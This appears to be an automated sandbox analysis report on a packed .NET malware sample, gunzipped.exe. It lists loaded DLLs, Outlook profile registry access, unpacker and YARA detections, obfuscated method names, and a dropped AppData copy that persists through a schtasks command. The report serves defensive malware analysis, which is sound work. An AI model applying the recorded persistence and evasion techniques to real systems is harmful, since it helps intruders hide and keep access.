Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\gunzipped.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: gunzipped.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: gunzipped.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	.Net Code: jZ3j8udRga System.Reflection.Assembly.Load(byte[])
Source: 0.2.gunzipped.exe.5110000.5.raw.unpack, LoginForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, LoginForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 9.2.WiHDtnb.exe.2c6d1d4.0.raw.unpack, LoginForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_058512C8 push esp; ret	9_2_058512C9
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_0585C23C pushad ; ret	9_2_0585C23F
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06322247 push es; ret	9_2_06322260
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 12_2_00402AC0 push eax; ret	12_2_00402AD4
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 12_2_00402AC0 push eax; ret	12_2_00402AFC

Source: gunzipped.exe	Static PE information: section name: .text entropy: 7.886814119771072
Source: WiHDtnb.exe.0.dr	Static PE information: section name: .text entropy: 7.886814119771072

Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, Jn2EnVIQDOPAQsH9rP.cs	High entropy of concatenated method names: 'Dispose', 'fl32WdCKVL', 'i0JJsvsUZN', 'CZu44rplHX', 'JLW2wUQ7jT', 'pxt2zDcXXg', 'ProcessDialogKey', 'SflJYYTyES', 'WioJ2N1RU7', 'XFTJJbDhmT'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, rBPbMmzMtjydMGnjn4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLoqbrrr0f', 'RqnqXKiAYi', 'NlJqdQyjd4', 'klDqTqPE38', 'A5Vqvxg4wn', 'bRYqq4SJCJ', 'uBDqkFM5Co'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, YXLBSmHeAMwuvB1LF5.cs	High entropy of concatenated method names: 'zWnGoi1ScL', 'PRQG06SnTo', 'b1lG5uvZmS', 'DlEGa8lCST', 'RdnGP8GmDj', 'Q8J5pukTl5', 'PQi5NyWus0', 'P9f5yxLZt7', 'wjZ5fFg8Xq', 'Kuh5WGvsjP'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.cs	High entropy of concatenated method names: 'Qjb0ZlJLYr', 'Tho0Bs5vhM', 'sgg03S1ddt', 'Gfx0VrebwU', 'ouN0prX4ZE', 'qWB0NaXcsa', 'AaS0yRKXWt', 'nJs0fv38XX', 'xZP0WsJmAb', 'jSP0wKdbSE'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, vdXHWAhggmuwWk28UG.cs	High entropy of concatenated method names: 'n7VaQ7jJFD', 'lRUamUKjGD', 'NE4a8xbneo', 'tfraELnnTY', 'Rw6axfFQX7', 'fHLaKOdLdQ', 'Sc4acDtbpx', 'AqNalbxp6K', 'cXxa9dpOZP', 'XNRaCVpscU'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, CQlcd80GsnC8o2YDwN.cs	High entropy of concatenated method names: 'l7XvMBvgWa', 'ab7v0TxHPs', 'OO3vUkXy7c', 'c58v5r0JUq', 'T54vG0f89s', 'LG9va6xh0Y', 'aFavPA5wBR', 'bkrvS1YguX', 'wgFvhiI0pK', 'gblvA6CHa0'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, I5OmECnjy883pdUQsx.cs	High entropy of concatenated method names: 'efeUEG7RaE', 'VqTUKYCl9F', 'D4HUlJlUkR', 'xStU9n51bn', 'K8aUXL3x6p', 'BkcUdOSGjR', 'XF9UTtWGDl', 'LjkUvyDQpS', 'XtyUqYpxvU', 'D4yUkENaUd'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, oZqwNLW6n8ZvFWkqcr.cs	High entropy of concatenated method names: 'va38vywhi', 'IlyE0SsL1', 'TjlKrcnqj', 'VBvcjROEQ', 'cHl94WOcv', 'g7aCMVe7t', 'kdrOhajPO2heXmj8Y5', 'FHGppeguJiAF9Lp3Za', 'D7H7LTb1sFY1J4jOse', 'bCpvNAJXx'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, IqUFlYUT5mgAcFF8QH.cs	High entropy of concatenated method names: 'qTMXHFxni6', 'VPeX19PQDM', 'ybFXZncnkG', 'qQBXBEA42i', 'NbxXsoIAox', 'HGqXOiA9xl', 'dHKXLfc0gV', 'mWWXD7egBP', 'qiHXihsEFQ', 'wduXuWEuVg'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, XhfMnd878lAOdC1G2f.cs	High entropy of concatenated method names: 'xCoblSyDyr', 'EVGb9in1HV', 'sldbIvgse7', 'yXabs86xDg', 'aiQbLnZhZU', 'I4qbDpd1mB', 'wZ3buR6y3x', 'EV0b6F0W6X', 'LB1bHPQCIH', 'Kq8brwSHOe'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, IQxL105Tu2BGiAI5Mx.cs	High entropy of concatenated method names: 'Cl1vIN4EMT', 'YCUvsSOymS', 'qoLvOfiJAb', 'JZcvL6nxvm', 'uCUvZIBphK', 'enDvDQFiTh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, q03tcrBrNaye7G2suDI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'z1NkZasdmL', 'hKxkBnbC8X', 'WSpk3hqIb9', 'w5vkVX3Zyw', 'B81kpdwusW', 'XknkN8NOSj', 'bepkyCEjiD'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, LQIEEZqSBkUyfaw4Mb.cs	High entropy of concatenated method names: 'V2t2a9KA8h', 'dU62PYiCSe', 'EwX2hvl4UX', 'vHF2AVgEZt', 'arR2XBM0QJ', 'UiU2d7VAdE', 'ftxDWv0GvAtG2aTrPk', 'nxf5JiMJB4glmFsPQB', 'dtT22ttp8r', 'xvb2gSn6Z1'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, mIR5saYmuhXPx2Zl9f.cs	High entropy of concatenated method names: 'aEQTfarKes', 'GRwTwFuHuX', 'GHwvY94jxS', 'kqKv21Wamn', 'HgwTr9pp2P', 'JT6T1EVRsb', 'TZZT7CjLUl', 'd6PTZruoy8', 'LHgTBBA5JA', 'SrRT3BInVB'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, x7K8maR0qhDw2haw0u.cs	High entropy of concatenated method names: 'gTO5xAatZU', 'u405cqHQdt', 'eaUUOZD5XN', 'fVmULnA7gO', 'VJGUDVSOsO', 'cGgUiD2Lah', 'p1sUuaHLBX', 'jHRU6ghouj', 'wRvUR38ENN', 'wSkUHtCbl7'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, FtjtbYBFqN1dUmF0V1a.cs	High entropy of concatenated method names: 'N6oqQ3oC2t', 'IAuqmaMbSb', 'Gtlq8tWifO', 'aHhqE1a8C7', 'O1fqxPBcsQ', 'H7VqKZnYxM', 'yrnqcPsNZi', 'TKYqlv0EuZ', 'mbSq93mHCq', 'BMSqCIh3NY'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, AtgduKZWyWTv7OA0rF.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'B1aJWJgnRJ', 'hCiJwQ6t0h', 'tkUJzZKUjX', 'qOMgYd2SVG', 'r90g2qdaR2', 'HA1gJUHBJC', 'gJRggOWIu9', 'mJqSjZplnIy8ANkuNWS'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, Vh06207SCl76GKsVrU.cs	High entropy of concatenated method names: 'b0kq2qaVdp', 'ynqqgRWFCW', 'g69qjTln9g', 'kMnqMqgWt4', 'Mo6q0V8TmJ', 'UoPq5M0gFu', 'OKHqG9AU11', 'gonvyBg0cu', 'JwdvfEh4su', 'WnIvWoFg3d'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	High entropy of concatenated method names: 'RyxgoKu4hA', 'J6PgMFrKhD', 'W5xg0YFccC', 'b8XgUGf7EE', 'EH6g5PQcEY', 'gRegGLCeXy', 'skFgaBIDvO', 'E1ygPLCLDj', 'UZsgSk6coO', 'tyUghZ3UlC'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, JR1vqud7YpclTLHFs7.cs	High entropy of concatenated method names: 'ToString', 'K1Ldr8JheI', 'NlJdslW34E', 'lBddOe4olE', 'fBPdLaWdcb', 'isFdDpqPjA', 'wI5difqVNb', 'vQbdul9Kfu', 'q9Id6bCKKH', 'gCedRAmhBy'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, lSgBETOKP5wE1xrnvT.cs	High entropy of concatenated method names: 'zQpaMA6sLw', 'Ka4aU2psGW', 'cBOaGokXuY', 'NOTGw9kNIY', 'MvPGzWAHm2', 'KZ9aYk0biN', 'wd8a23YbD9', 'YBgaJrcatf', 'DQCagXVQQV', 'UYVajyyyp9'

Source: C:\Users\user\Desktop\gunzipped.exe

File created: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\gunzipped.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
